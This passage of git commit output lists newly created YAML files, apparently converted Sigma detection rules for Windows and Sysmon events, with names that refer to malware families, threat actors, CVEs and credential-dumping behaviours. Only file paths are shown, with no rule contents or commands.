tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_event/registry_event_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/posh_ps_cl_invocation_lolscript_count.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_access_fake_files_with_stored_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_mal_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_remote_schtask.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_global_catalog_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_rare_schtasks_creations.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_samr_pwset.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_susp_failed_hidden_share_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_system_rare_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/win_alert_mimikatz_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_antimalware_platform_expired.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_asr_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_asr_psexec_wmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_exclusion_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_sample_submission_consent.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_history_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_malware_detected_amsi_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_real_time_protection_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_real_time_protection_errors.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_restored_quarantine_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_suspicious_features_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_tamper_protection_trigger.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_threat.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_virus_scan_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/wmi/win_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_ttdinjec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_susp_ip_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_susp_clr_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_advapi32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_scm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_svchost_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/net_connection_win_binary_github_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_lazagne_cred_dump_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_lsass_susp_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_dragonfly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cscript_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_indirect_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_office.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_mal_ryuk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_new_service_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_psexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_run_from_zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_service_stop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_run_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_whoami_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_add_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_office_security.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_silentprocessexit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_esentutl_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_rclone_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_anonymfiles_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_appinstaller.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_cloudflared_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_devtunnels_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_ufile_io_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_mal_drivers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_mal_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_pua_system_informer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_susp_temp_use.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_drivers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_windivert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml create mode 100644 